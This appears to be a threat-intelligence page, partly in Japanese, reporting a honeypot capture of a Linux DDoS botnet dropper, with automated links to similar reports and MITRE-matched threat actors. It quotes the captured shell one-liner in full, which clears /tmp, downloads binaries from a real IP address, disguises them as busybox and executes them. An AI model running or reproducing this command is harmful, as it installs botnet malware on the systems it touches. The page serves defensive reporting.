Trusted Design

Honeypot, typical linux ddos botnet script

概要

Pretty common ddos script drop. Contents: cd /tmp;rm -rf *;wget hxxp://173.242.119.122/wsfw;cat wsfw >busybox;chmod 777 busybox;./busybox cd /tmp;rm -rf *;wget hxxp://173.242.119.122/ewjkn;cat ewjkn >busybox;chmod 777 busybox;./busybox cd /tmp;rm -rf *;wget hxxp://173.242.119.122/apodn;cat apodn >busybox;chmod 777 busybox;./busybox cd /tmp;rm -rf *;wget hxxp://173.242.119.122/sojsn;cat sojsn >busybox;chmod 777 busybox;./busybox cd /tmp;rm -rf *;wget hxxp://173.242.119.122/jsdj;cat jsdj >busybox;chmod 777 busybox;./busybox

Created: 2026-02-23

Indicators

Indicatorsは見つかっていない。

類似Pulses

Trojan-DDoS download - Honeypot detection (score: 0.63)
Linux/Gafgyt Malware (score: 0.63)
Linux DDoS Malware delivered via SSH (score: 0.59)
Hajime Stage 2 Loader URLs (score: 0.59)
DDoS Botnet NK (score: 0.58)

このPulseに関連する脅威アクター (事実ベース)

HAFNIUM

Score: 3.62

Matched TTPs:

T1049 - System Network Connections Discovery

MITREへのリンク →

Axiom

Score: 3.62

Matched TTPs:

T1049 - System Network Connections Discovery

MITREへのリンク →

Sandworm Team

Score: 8.16

Matched TTPs:

T1049 - System Network Connections Discovery
T1075 - Pass the Hash

MITREへのリンク →

Volt Typhoon

Score: 3.62

Matched TTPs:

T1049 - System Network Connections Discovery

MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

Sandworm Team

Score: 0.77

Matched TTPs:

T1075 - Pass the Hash
T1049 - System Network Connections Discovery

MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクターグラフ

← Pulse一覧に戻る

Honeypot, typical linux ddos botnet script

概要

Indicators

類似Pulses

このPulseに関連する脅威アクター (事実ベース)

HAFNIUM

Axiom

Sandworm Team

Volt Typhoon

このPulseに関連する脅威アクター (推論ベース)

Sandworm Team

Related CVEs

Pulse – 脅威アクター グラフ

Pulse – 脅威アクターグラフ